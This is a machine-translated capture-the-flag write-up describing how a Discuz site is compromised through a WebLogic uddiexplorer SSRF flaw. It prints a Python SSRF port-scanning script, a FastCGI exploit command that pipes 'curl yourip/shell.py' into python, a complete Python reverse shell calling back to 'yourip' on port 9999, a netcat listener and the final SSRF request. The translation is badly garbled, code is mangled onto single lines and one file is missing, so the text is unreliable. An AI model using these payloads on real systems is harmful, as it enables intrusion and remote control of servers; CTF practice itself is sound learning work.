Three white hats-looking for you from the stars-the first phase

Three white hats-looking for you from the stars-the first phase

Challenge Introduction

From the stars you are lost by me, I may need to use all my everything to get you back, made up two sentences can not be made up, OK, I admit this is a problem of infiltration, is so direct.

Challenge goals

http://0761e975dda0c67cb.jie.sangebaimao.com/

0X01 Information Collection

Open address, is a DZ theory altar. It doesn't seem like much fun, it's the latest version.

Since it is penetrating, feel the sacrifice of the killer "Scan catalogue"! (The dictionary is the key)

Get to the key information soon (excluding DZ's original catalogue and pages)

/info.php/uddiexplorer/

One is phpinfo () information, very useful.

/opt/discuz/info.php

The other one is WebLogic.

Baidu "Uddiexplorer loophole", the horse can know WebLogic uddiexplorer existence SSRF loophole.

The key to this penetration is SSRF!!!

Exploiting vulnerabilities

SSRF is not just about the internet, it's about three white hat's end-of-the-world Docker, making 127.0.0.1!

Can Baidu Ah, search the key word "searchpublicregistries SSRF vulnerability Exp"

Get HTTP://WWW.TUICOOL.COM/ARTICLES/UJAQIBZ

Get a foot book, modify it yourself and get it!!!

Port scan. py

#!/usr/bin/env Python #-*-coding:utf-8-*-import reimport requestsdef Scan (IP_STR): url = ' http://0761e975dda0c67cb.jie.sangebaimao.com ' ports = (' 21 ', ' 22 ', ' 23 ', ' 53 ', ' 80 ', ' 1080 ', ' 1433 ', ' 1521 ', ' 3306 ', ' 3389 ', ' 4899 ', ' 8080 ', ' 7001 ', ' 8000 ', ' 9000 ', ' 9001 ', ' for port in ports:exp_url = url+ '/UDDIEXPLORER/SEARCHPUBLICR egistries.jsp?operator=http://%s:%s&rdosearch=name&txtsearchname=sdf&txtsearchkey=& Txtsearchfor=&selfor=business+location&btnsubmit=search "% (ip_str, port) Try:response = Requests . Get (Exp_url, timeout=15, verify=false) re_sult1 = Re.findall (' Weblogic.uddi.client.structures.exception.XML_So Apexception ', response.content) re_sult2 = Re.findall (' but could not connect ', response.content) if Le N (RE_SULT1)!=0 and Len (re_sult2) ==0:print ip_str+ ': ' +port except Exception, E:passif __ name__ = = "__main__": Scan (' 127.0.0.1 ') 

Successfully break out 22,80,3306,7001,9000 and other ports.

Ssrf+gopher has always been very good, and recently it is hot.

or Baidu ~ ~

RR Chicory Latest article "Do Evil things with gopher://"

0X03 Attack FastCGI

In general, FastCGI are bound on 127.0.0.1 ports, but GOPHER+SSRF can be used to execute arbitrary commands with perfect attack FastCGI.

0X06 Reference

Remote use of PHP FastCGI

command to execute.

Download Fcgi_exp

The line

Nc-l-P 9000 >x.txt & Go Run fcgi_exp.go system 127.0.0.1 9000/opt/discuz/info.php "Curl Yourip/shell.py|python" p Hp-f gopher.php

Save payload to X.txt

Anti-bomb Shell Black Technology, bash anti-bomb ineffective ~ ~

Then UrlEncode encoded payload generate ssrf.php

shell.py

Import Socket,subprocess,os  s=socket.socket (socket.af_inet,socket. SOCK_STREAM)  S.connect (("Yourip", 9999))  os.dup2 (S.fileno (), 0) os.dup2 (  S.fileno (), 1)  os.dup2 ( S.fileno (), 2)  p=subprocess.call (["/bin/bash", "-I"]);

gopher.php

 
  ");? >

Successfully generated the use of file ssrf.php

Anti-bomb shell

VPS Line

NC-LVV 9999

Using SSRF

http://0761e975dda0c67cb.jie.sangebaimao.com/uddiexplorer/searchpublicregistries.jsp?&rdosearch=name& txtsearchname=sdf&txtsearchkey=&txtsearchfor=&selfor=business%20location&btnsubmit=search& operator=yourip/ssrf.php

Successful anti-bomb ~ ~ ~

Getflag

Find it yourself.

